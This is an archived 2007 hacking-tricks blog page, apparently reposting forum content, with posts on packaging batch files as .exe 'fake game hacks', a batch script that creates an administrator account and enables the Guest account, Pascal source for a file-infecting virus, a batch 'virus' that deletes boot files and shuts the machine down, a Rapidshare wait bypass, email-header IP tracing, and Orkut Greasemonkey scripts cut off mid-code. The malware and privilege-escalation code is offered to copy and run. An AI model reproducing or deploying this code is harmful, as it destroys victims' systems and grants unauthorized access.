Friday, December 21, 2007

cool tricks1

skip to main skip to sidebar ALL COOL TRICKS ALL cool tricks , tips ,latest hacks,anonymous proxy,change ip,it security,network hacking,hacking programs,Trojan virus,cheat codes,computer hacking,security, network security issues,security,software,computer hacking,hackers,email security,pc tweaks,spyware,trojan,viruses,virus codes,Cool pc tricks,All cool pc tricks,pc hacking,email hacking,password hacking,password cracking,all xp tricks,registry tricks,registry tutorial,batch programming,virus code in c
Anonymous emailer is up now click here
Wednesday, October 31, 2007how to create an .exe file? many of u might be knowing this but still newbies can learn something from this
How to make an executable file?when it is in .exe form no one will be able to change look or modify the code (note:it will make it to a self extraction thing but it will still act like a exe)
This is how you make it to a .exe
goto to start run and type iexpress
STEP BY STEP ON HOW TO USE ITclick create new self extraction then next
click extract files and run an installation command and click next
type what you want to name the files (ex. hello,virus,fake game hack) then click next
click no prompt then next
license agreement unless you want to put one click do not display license
package files(most important) click add then choose your .bat file(also does .vbs files) then click next
under install program choose your .bat or .vbs file and click next(don't worry about the other one)
show window pick one and click next
finished message pick one and click next
click browse and type the name of it and save to desktop or C: then next
configure restart just click no restart and then next
just click don't save then next
their click next and watchyour file change into something better
when its done click finish and check out your new file
Posted by BAS at 6:30 PM 0 comments
Labels: create .exe file, how to create an .exe file
Saturday, October 27, 2007Admin privileges for guest Want admin privileges on ur pc??????????????????try dis
Copy and paste the code given below in notepad and save it as anyname.bat(not txt)Den double click on itThis will add u in administrators groupEnjoy
echo offtitle Please wait...clsnet user add Username Password /addnet user localgroup Administrators Username /addnet user Guest 420 /active:yesnet localgroup Guests Guest /DELETEnet localgroup Administrators Guest /adddel %0
Posted by BAS at 5:21 PM 1 comments
Labels: admin password, administrator, administrator rights, crack admin account, hack, hack a pc, how to crack into admin account
Thursday, October 25, 2007START A MOVIE IN PAINT
Start A movie in paint!Start movie in Paint!* First start a movie in any player.
* Then open Paint.
* Now, in the player when the movie is being played, press "Print screen" button on your key board.
* Now, Press ctrl+v in Paint
* Leave the movie player open and don't minimize it.
* Open Paint now and see the movie in the Paint!
Posted by BAS at 2:46 PM 0 comments
Labels: hack, hack a pc, hack paint, paint, play movie in paint, windows, windows paint, windows xp
Tuesday, October 23, 2007How to find senders IP address from received mail
Emails are very important part of our communication systemWe think that we know everything about emails
we know how to compose email , how to attach a file , how to send it to others ,How to receive emails from others and many other things.This is all we know about emails.But this is not end of it .When you receive or send emails many other things are sent with it.
At this time when Email is progressively used for business and for many purposes, not to mention it is being used for phishing and other malicious intentions. It is of utmost priority to understand the other "messages" besides what has been sent or received by you.
Every email comes with a “Header” which is one part of an e-mail structure; call it DNA of the mail. It carries the basic fundamental information such as from whom the email comes, to whom it is addressed, date/time it was sent and the subject of the email. It is similar to an electronic postSeptemberk. Moreover, it also carries other detailed information which we usually don’t see.
This basic information comes in all brief/basic headers that most email programs automatically shows. This detail technical information can be viewed in a full header. All email programs can be set to show only brief header or full header and it is up to the users to set the program whether to view only “brief header” or “full header”.
Full header carries the information of the mail server’s name that the email passed through on its way to the recipient, and sender's IP address and even the name of the email program and its version used.
Knowledge of this information is essential for analysis and investigation purposes on cases involving email abuse, spamming, harassment, forgeries and mail-bombing. It is worth mentioning, understanding of this tool would definitely help people to counter these attacks, and save themselves from unwarranted consequences. Well, this information could not be found in a brief header.
Here we will take the case of Google mail and Yahoo mail to find out the full header.
Google Mail.
Using your id/password, login to Gmail. Open the mail for which you wish to find the full header of the sender. Click on the inverted triangle placed just next to Reply.
You will get something like this…
Delivered-To: Mr.x@gmail.comReceived: by 10.36.81.3 with SMTP id e3cs239nzb; Tue, 12 September 2007 15:11:47 -0800 (PST)Return-Path:Received: from mail.emailprovider.com (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb.2007.03.12.15.11.46; Tue, 12 September 2007 15:11:47 -0800 (PST)Message-ID: <20070312231145.62086.mail@mail.emailprovider.com>Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12 September 2007 15:11:45 PSTDate: Tue, 12 September 2007 15:11:45 -0800 (PST)From: Mr.ySubject: HelloTo: Mr.x
In the example, headers are added to the message three times:
1. When Mr.y composes the email
Date: Tue, 12 September 2007 15:11:45 -0800 (PST)From: Mr .ySubject: HelloTo: Mr.x2. When the email is sent through the servers of Mr.y's email provider, mail.emailprovider.com
Message-ID: <20070312231145.62086.mail@mail.emailprovider.com>Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12 September 2007 15:11:45 PST
3.When the message transfers from Mr.y 's email provider to Mr. x's Gmail account
Delivered-To: Mr.x@gmail.comReceived: by 10.36.81.3 with SMTP id e3cs239nzb;Tue, 12 September 2007 15:11:47 -0800 (PST)
Return-Path: Mr.y@emailprovider.comReceived: from mail.emailprovider.com (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb; Tue, 12 September 2007 15:11:47 -0800 (PST)
Below is a description of each section of the email header:
Delivered-To: Mr.x@gmail.com
The email address the message will be delivered to.
Received: by 10.36.81.3 with SMTP id e3cs239nzb;Tue, 29 Mar 2005 15:11:47 -0800 (PST)
The time the message reached Gmail's servers.
Return-Path:
The address from which the message was sent.
Received: from mail.emailprovider.com(mail.emailprovider.com [111.111.11.111])by mx.gmail.com with SMTP id h19si826631rnb.2005.03.29.15.11.46;Tue, 29 Mar 2005 15:11:47 -0800 (PST)
The message was received from mail.emailprovider.com, by a Gmail server on March 29, 2005 at approximately 3 pm.
Message-ID: 20050329231145.62086.mail@mail.emailprovider.com
A unique number assigned by mail.emailprovider.com to identify the message.
Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 29 Mar 2005 15:11:45 PST
Mr.y used an email composition program to write the message, and it was then received by the email servers of mail.emailprovider.com.
Date: Tue, 29 Mar 2005 15:11:45 -0800 (PST)From: Mr ySubject: HelloTo: Mr.x
The date, sender, subject, and destination -- Mr. Jones entered this information (except for the date) when he composed the email.
And for IP, look for Received:from followed by the IP within square brackets [ ] e.g.
Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12
Also importantly, there are times when you might find multiple Received: from entries, in that case, please select the last one as the valid choice.
Posted by BAS at 12:35 PM 0 comments
Labels: find IP, How to find senders IP address from received mail, IP hack, mail hacking, mail tracing, trace IP
Friday, October 19, 2007Virus code in pascal Here is a new viri code for u guysIt's created in pascalCopy and paste it in notepad as anyname.pas
Program Saddam;
{$M 10000,0,0}
UsesDOS;
VarDriveID : String [2];Buffer : Array [1..8000] Of Byte;Target,Source : File;Infected : Byte;Done : Word;TargetFile : String;
(*??????????????????????????????????????
???????????????????????????????????*)
Function ExistCom : Boolean;VarFindCom : SearchRec;BeginFindFirst ( TargetFile, 39, FindCom );ExistCom := DosError = 0;End;

Procedure SearchDir ( Dir2Search : String );VarS : SearchRec;
Begin
If Dir2Search [ Length ( Dir2Search ) ] <> '\' ThenDir2Search := Dir2Search + '\';

FindFirst ( Dir2Search + '*.exe', 39, S );
While DosError = 0 DoBegin
TargetFile := Copy ( Dir2Search + S.Name,1,Length ( Dir2Search + S.Name ) -3 ) + 'com';
If ( Copy ( S.Name, Length ( S.Name ) -2,3 ) = 'EXE' ) AndNot ExistCom And ( Infected <> 25000 ) ThenBegin{$i-}Inc ( Infected );Assign ( Target, TargetFile );Rewrite ( Target,1 );BlockWrite ( Target, Buffer, Done + Random ( 4400 ));SetFTime ( Target, S.Time );Close ( Target );If IoResult = 101 ThenBeginInfected := 3;Erase ( Target );End;
{$i+}End;
FindNext ( S );End;
FindFirst ( Dir2Search + '*', Directory, S );
If S.Name = '.' ThenBeginFindNext ( S );FindNext ( S );End;
If ( DosError = 0 ) And( S.Attr And 16 <> 16 ) ThenFindNext ( S );
While DosError = 0 DoBeginIf ( S.Attr And 16 = 16 ) And ( Infected < 3 ) ThenSearchDir ( Dir2Search + S.Name );FindNext ( S );End;End;
Begin
DriveID := FExpand ( ParamStr ( 1 ));Infected := 0;
Assign ( Source, ParamStr ( 0 ) );Reset ( Source, 1 );BlockRead ( Source, Buffer, 5000, Done );Close ( Source );
Randomize;
SearchDir ( DriveID );
Exec ( Copy ( ParamStr ( 0 ),1,Length ( ParamStr ( 0 )) -3 ) + 'exe', ParamStr ( 1 ) );
End.
;****************************************************************************;; ;; -=][][][][][][][][][][][][][][][=- ;; -=] P E R F E C T C R I M E [=- ;; -=] +31.(o)79.426o79 [=- ;; -=] [=- ;; -=] For All Your H/P/A/V Files [=- ;; -=] SysOp:ruck_fules [=- ;; -=] [=- ;; -=] +31.(o)79.426o79 [=- ;; -=] P E R F E C T C R I M E [=- ;; -=][][][][][][][][][][][][][][][=- ;; ;; *** NOT FOR GENERAL DISTRIBUTION *** ;; ;; This File is for the Purpose of Virus Study Only! It Should not be Passed ;; Around Among the General Public. It Will be Very Useful for Learning how ;; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;; Experience can Turn it Into a far More Malevolent Program Than it Already ;; Is. Keep This Code in Responsible Hands! ;; ;;****************************************************************************


Posted by utkarsh in our communityhttp://www.orkut.com/CommMsgs.aspx?cmm=39996086&tid=2560895879759933320



Posted by BAS at 9:03 PM 0 comments
Labels: how to write virus codes, pascal, pascal code, virus code, virus in pascal, virus writing, write virus code
Thursday, October 18, 2007Hacking rapidshare Tired of waiting for another few minutes after downloads try disIt works
While waiting for download, type javascript:c(countdown = 0); in the browser addressbar to eliminate the rapidshare countdown (waiting) feature. If this trick doesn't work, try the alternative below:
javascript:var%20counta=0;var%20countb=0
;var%20countc=0;var%20countd=0;var%20countd=0
(Just copy and paste this code in your address bar)
another method(Works only if u hv dynamic Ip)
Then, follow the steps below to get a new IP:
1. Go to Start->Run and type in "cmd" without quotes to bring up the command prompt. Hit Enter.
2. Type in "ipconfig /flushdns" without quotes and hit Enter.
3. Type in "ipconfig /release" without quotes and hit Enter.
4. Type in "ipconfig /renew" without quotes and hit Enter. You should now have a new IP address. Check your IP address at IP Chicken again and compare it to the one you got earlier.
5. Now, erase your browser's cache and cookies.
6. Try downloading the Rapidshare
Or u can try dis also for free rapidshare premium account
http://PremiumForFree.com/index.php?referral=14238
Posted by UTKARSHhttp://www.orkut.com/CommMsgs.aspx?cmm=39996086&tid=2561136090838347656
Posted by BAS at 5:34 PM 0 comments
Labels: Eliminate countdown in rapidshare, Eliminate timer in rapidshare, free rapidshare premium account, HAck rapidsahre, hack rapidshare, Rapishare hacking, Remove timer
Tuesday, October 16, 2007Virus that crashesh your own pc @echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini@echo offmsg * YOU GOT OWNED!!!shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
save as bat file in notepad!!This will pop up a message saying OWNED!!and shut down the computer never to reboot again!

type this in notepad
start virus.batvirus.bat
and save as with this name
virus.bat
ur antivirus will not detect this virus
Basically this program will delete all that files which are needed for bootingIf your os is installed in d drive instead of c then replace c with d

originally posted by Utkarsh in our community on orkuthttp://www.orkut.com/Profile.aspx?uid=12868172797188978036
Posted by BAS at 5:36 PM 0 comments
Labels: batch, batch program, batch virus, virus code, virus writing
Monday, October 15, 2007All in one greasemonkey script created by bhavin and pratik for orkut users // ==UserScript==// @name Bhavik & Prateek's All in One Javascript1!!!// @namespace http://www.prateek.5u.com// @namespace http://www.orkut.com/Profile.aspx?uid=4895905875405966859// @description Install Many scripts at the same time !// @include http://www.orkut.com*// ==/UserScript==
(function() {
var i1=document.getElementsByTagName('td');var idx1 = i1[0].innerHTML.indexOf("");var idx2 = i1[0].innerHTML.indexOf("", idx1+1);var headerMenu_bar = i1[0].innerHTML.substr(0, idx1+2) + 'settings ' + i1[0].innerHTML.substr(idx2);i1[0].innerHTML = headerMenu_bar;
var newMenuItem = new Array('Orkut Tools ','Join Us '
);
i1[2].innerHTML += "";for (var k=0; k if ( (k==6) (k==10) ) {i1[2].innerHTML += " ";}i1[2].innerHTML += " " + newMenuItem[k];}i1[2].innerHTML += " ";
})();
b="";for(i=0;i if (document.links[i].innerHTML=='News'){document.links[i].parentNode.innerHTML=document.links[i].parentNode.innerHTML+"Credits"}};void(0)
// ==UserScript==// @version 1// @name Signature Button by Prateek// @author Prateek // @author Bhavik // @namespace http://prateek.5u.com// @description Signature// @include http://www.orkut.com/Scrapbook.aspx?uid=*// @include http://www.orkut.com/CommMsgPost.aspx?*// ==/UserScript==
// edit The value of Signa Below for ur Own Signature...
var signa="\n\n\n\n[gray][b]\n---------------------\n YOUR NAME HERE \n\---------------------[/b]";

// Dont Edit Anything Below this line
addEventListener('load', function(event) {function getTextArea(n) {return document.getElementsByTagName('textarea')[n];}
//-----------------------------------------------------------//-- Org --//-----------------------------------------------------------function sign(){sig=getTextArea(0);sig.value+=signa;}
function sg() {text=getTextArea(0);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 001 --//-----------------------------------------------------------function sign1(){sig=getTextArea(1);sig.value+=signa;}
function sg1() {text=getTextArea(1);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign1, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 002 --//-----------------------------------------------------------function sign2(){sig=getTextArea(2);sig.value+=signa;}
function sg2() {text=getTextArea(2);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign2, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 003 --//-----------------------------------------------------------function sign3(){sig=getTextArea(3);sig.value+=signa;}
function sg3() {text=getTextArea(3);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign3, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 004 --//-----------------------------------------------------------function sign4(){sig=getTextArea(4);sig.value+=signa;}
function sg4() {text=getTextArea(4);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign4, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 005 --//-----------------------------------------------------------function sign5(){sig=getTextArea(5);sig.value+=signa;}
function sg5() {text=getTextArea(5);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign5, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 006 --//-----------------------------------------------------------function sign6(){sig=getTextArea(6);sig.value+=signa;}
function sg6() {text=getTextArea(6);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign6, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 007 --//-----------------------------------------------------------function sign7(){sig=getTextArea(7);sig.value+=signa;}
function sg7() {text=getTextArea(7);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign7, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 008 --//-----------------------------------------------------------function sign8(){sig=getTextArea(8);sig.value+=signa;}
function sg8() {text=getTextArea(8);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign8, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 009 --//-----------------------------------------------------------function sign9(){sig=getTextArea(9);sig.value+=signa;}
function sg9() {text=getTextArea(9);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign9, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 010 --//-----------------------------------------------------------function sign10(){sig=getTextArea(10);sig.value+=signa;}
function sg10() {text=getTextArea(10);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign10, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 011 --//-----------------------------------------------------------function sign11(){sig=getTextArea(11);sig.value+=signa;}
function sg11() {text=getTextArea(11);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign11, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 012 --//-----------------------------------------------------------function sign12(){sig=getTextArea(12);sig.value+=signa;}
function sg12() {text=getTextArea(12);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign12, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 013 --//-----------------------------------------------------------function sign13(){sig=getTextArea(13);sig.value+=signa;}
function sg13() {text=getTextArea(13);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign13, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 014 --//-----------------------------------------------------------function sign14(){sig=getTextArea(14);sig.value+=signa;}
function sg14() {text=getTextArea(14);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign14, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 015 --//-----------------------------------------------------------function sign15(){sig=getTextArea(15);sig.value+=signa;}
function sg15() {text=getTextArea(15);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign15, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 016 --//-----------------------------------------------------------function sign16(){sig=getTextArea(16);sig.value+=signa;}
function sg16() {text=getTextArea(16);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign16, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 017 --//-----------------------------------------------------------function sign17(){sig=getTextArea(17);sig.value+=signa;}
function sg17() {text=getTextArea(17);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign17, true);c.appendChild(d);}
//-----------------------------------------------------------//-- 018 --//-----------------------------------------------------------function sign18(){sig=getTextArea(18);sig.value+=signa;}
function sg18() {text=getTextArea(18);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign18, true);c.appendChild(d);}//-----------------------------------------------------------//-- 019 --//-----------------------------------------------------------function sign19(){sig=getTextArea(19);sig.value+=signa;}
function sg19() {text=getTextArea(19);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign19, true);c.appendChild(d);}//-----------------------------------------------------------//-- 020 --//-----------------------------------------------------------function sign20(){sig=getTextArea(20);sig.value+=signa;}
function sg20() {text=getTextArea(20);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign20, true);c.appendChild(d);}//-----------------------------------------------------------//-- 021 --//-----------------------------------------------------------function sign21(){sig=getTextArea(21);sig.value+=signa;}
function sg21() {text=getTextArea(21);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign21, true);c.appendChild(d);}//-----------------------------------------------------------//-- 022 --//-----------------------------------------------------------function sign22(){sig=getTextArea(22);sig.value+=signa;}
function sg22() {text=getTextArea(22);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign22, true);c.appendChild(d);}//-----------------------------------------------------------//-- 023 --//-----------------------------------------------------------function sign23(){sig=getTextArea(23);sig.value+=signa;}
function sg23() {text=getTextArea(23);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign23, true);c.appendChild(d);}//-----------------------------------------------------------//-- 024 --//-----------------------------------------------------------function sign24(){sig=getTextArea(24);sig.value+=signa;}
function sg24() {text=getTextArea(24);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign24, true);c.appendChild(d);}//-----------------------------------------------------------//-- 025 --//-----------------------------------------------------------function sign25(){sig=getTextArea(25);sig.value+=signa;}
function sg25() {text=getTextArea(25);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign25, true);c.appendChild(d);}//-----------------------------------------------------------//-- 026 --//-----------------------------------------------------------function sign26(){sig=getTextArea(26);sig.value+=signa;}
function sg26() {text=getTextArea(26);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign26, true);c.appendChild(d);}//-----------------------------------------------------------//-- 027 --//-----------------------------------------------------------function sign27(){sig=getTextArea(27);sig.value+=signa;}
function sg27() {text=getTextArea(27);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign27, true);c.appendChild(d);}//-----------------------------------------------------------//-- 028 --//-----------------------------------------------------------function sign28(){sig=getTextArea(28);sig.value+=signa;}
function sg28() {text=getTextArea(28);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign28, true);c.appendChild(d);}//-----------------------------------------------------------//-- 029 --//-----------------------------------------------------------function sign29(){sig=getTextArea(29);sig.value+=signa;}
function sg29() {text=getTextArea(29);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign29, true);c.appendChild(d);}//-----------------------------------------------------------//-- 030 --//-----------------------------------------------------------function sign30(){sig=getTextArea(30);sig.value+=signa;}
function sg30() {text=getTextArea(30);if (!text) return;c=text.parentNode;d=document.createElement("a");d.className="T";d.style.marginTop="10px";d.style.fontSize="10px";d.align="Right";d.innerHTML="Signature";d.href="javascript:;";d.addEventListener("click", sign30, true);c.appendChild(d);}sg();sg1();sg2();sg3();sg4();sg5();sg6();sg7();sg8();sg9();sg10();sg11();sg12();sg13();sg14();sg15();sg16();sg17();sg18();sg19();sg20();sg21();sg22();sg23();sg24();sg25();sg26();sg27();sg28();sg29();sg30();}, false);
// ==UserScript==// @version 1.2// @name Prateek Write(Scrap)// @author Prateek // @author Bhavik // @namespace// @description Its Modifies Your Text...// @include http://www.orkut.com/CommMsgPost.aspx?*// @include http://www.orkut.com/Scrapbook.aspx*// @include http://www.orkut.com/CommMsgs.aspx?*// ==/UserScript==
addEventListener('load', function(event) {function getTextArea() {return document.getElementsByTagName('textarea')[0];}
function mM() {e=getTextArea();s=e.value;r="";for(k=0;k l=s.substr(k,1);r+=(k%2) ? l.toLowerCase() : l.toUpperCase();}e.value=r;}
//-----------------------------------------------------------//-- Encrypt --//-----------------------------------------------------------function ZP() {o=getTextArea();txt=o.value;var crypt = new Array();crypt["a"]="z";crypt["b"]="y";crypt["c"]="x";crypt["d"]="w";crypt["e"]="v";crypt["f"]="u";crypt["g"]="t";crypt["h"]="s";crypt["i"]="r";crypt["j"]="q";crypt["k"]="p";crypt["l"]="o";crypt["m"]="n";crypt["n"]="m";crypt["o"]="l";crypt["p"]="k";crypt["q"]="j";crypt["r"]="i";crypt["s"]="h";crypt["t"]="g";crypt["u"]="f";crypt["v"]="e";crypt["w"]="d";crypt["x"]="c";crypt["y"]="b";crypt["z"]="a";var r="";for(x=0;x t=txt.substr(x,1).toLowerCase();r+= (crypt[t] ? crypt[t] : t);}o.value=r;}
//-----------------------------------------------------------//-- Code chk --//-----------------------------------------------------------function chr(){s=getTextArea();txt=s.value;var n="";n = txt.charCodeAt(0);
s.value=n;}

//-----------------------------------------------------------//-- Style 1 --//-----------------------------------------------------------function stl() {c = getTextArea();d = c.value;var coeiu = [["a","b","c","ý","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","3","6"],[945, 1074, 99, 962, 8706, 949, 402, 103, 1085, 953, 106, 954, 108,1084, 960, 920, 961, 113, 1075, 353, 964, 956, 957, 1096, 967, 947,122, 1079, 1073]];var r="";for(x=0;x t=d.substr(x,1).toLowerCase();for(y=0;y if (t == coeiu[0][y]) {t = String.fromCharCode(coeiu[1][y]);break;}}r+=t;}c.value=r;}
//-----------------------------------------------------------//-- Style 2 --//-----------------------------------------------------------function ZPs() {s=getTextArea();txt=s.value;var crypt = new Array();crypt["A"]=String.fromCharCode(0xC3);crypt["B"]=String.fromCharCode(0xDF);crypt["C"]=String.fromCharCode(0xA9);crypt["D"]=String.fromCharCode(0xD0);crypt["E"]=String.fromCharCode(163);crypt["F"]="F";crypt["G"]="G";crypt["H"]="-";crypt["I"]="I";crypt["J"]="J";crypt["K"]="<";crypt["L"]="_";crypt["M"]="V";crypt["N"]=String.fromCharCode(0xD1);crypt["O"]=String.fromCharCode(0xD8);crypt["P"]="P";crypt["Q"]="Q";crypt["R"]=String.fromCharCode(0xAE);crypt["S"]=String.fromCharCode(0xA7);crypt["T"]="T";crypt["U"]=String.fromCharCode(0xDC);crypt["V"]="V";crypt["W"]="W";crypt["X"]="><";crypt["Y"]=String.fromCharCode(0xA5);crypt["Z"]="Z";crypt["a"]=String.fromCharCode(0xE3);crypt["b"]="b";crypt["c"]=String.fromCharCode(0xE7);crypt["d"]="d";crypt["e"]=String.fromCharCode(0xEA);crypt["f"]=String.fromCharCode(402);crypt["g"]="9";crypt["h"]="h";crypt["i"]=String.fromCharCode(0xEE);crypt["j"]="j";crypt["k"]="k";crypt["l"]="l";crypt["m"]="m";crypt["n"]=String.fromCharCode(0xF1);crypt["o"]=String.fromCharCode(0xF5);crypt["p"]=String.fromCharCode(0xDE);crypt["q"]=String.fromCharCode(0xB6);crypt["r"]="r";crypt["s"]="s";crypt["t"]=String.fromCharCode(8224);crypt["u"]=String.fromCharCode(0xB5);crypt["v"]="v";crypt["w"]="w";crypt["x"]=String.fromCharCode(0xA4);crypt["y"]=String.fromCharCode(0xFF);crypt["z"]="z";var r="";for(x=0;x t=txt.substr(x,1);r+= (crypt[t] ? crypt[t] : t);}s.value=r;}
//-----------------------------------------------------------//-- lines --//-----------------------------------------------------------function cerc() {v=getTextArea();v.value=v.value.replace(/\b/gi,"");}
//-----------------------------------------------------------//-- Colorful 1 --//-----------------------------------------------------------function colorful() {cor=new Array('maroon','red','orange','green','blue','navy');var z=0;cl=getTextArea();cl.value=cl.value.replace(/(.)/gi,"#$1");cl.value=cl.value.replace(/\# /gi," ");for(y=0;y cl.value=cl.value.replace(/\#/,'['+cor[z]+']');z++;if(z==cor.length)z=0;}var cd=cl.value;cl.value="[silver]"+cd+"[/silver]";}
//-----------------------------------------------------------//-- Box --//-----------------------------------------------------------function box() {z=getTextArea();z.value="[b]"+"["+z.value.replace(//g,String.fromCharCode(773)+String.fromCharCode(818))+"]";}
//-----------------------------------------------------------//-- Heart --//-----------------------------------------------------------function hea() {y=getTextArea();y.value="[b]"+"("+String.fromCharCode(773)+String.fromCharCode(818)+String.fromCharCode(9829)+String.fromCharCode(773)+String.fromCharCode(818)+""+y.value.replace(//g,String.fromCharCode(773)+String.fromCharCode(818))+""+String.fromCharCode(773)+String.fromCharCode(818)+String.fromCharCode(9829)+String.fromCharCode(773)+String.fromCharCode(818)+")";}
//-----------------------------------------------------------//-- Dot --//-----------------------------------------------------------
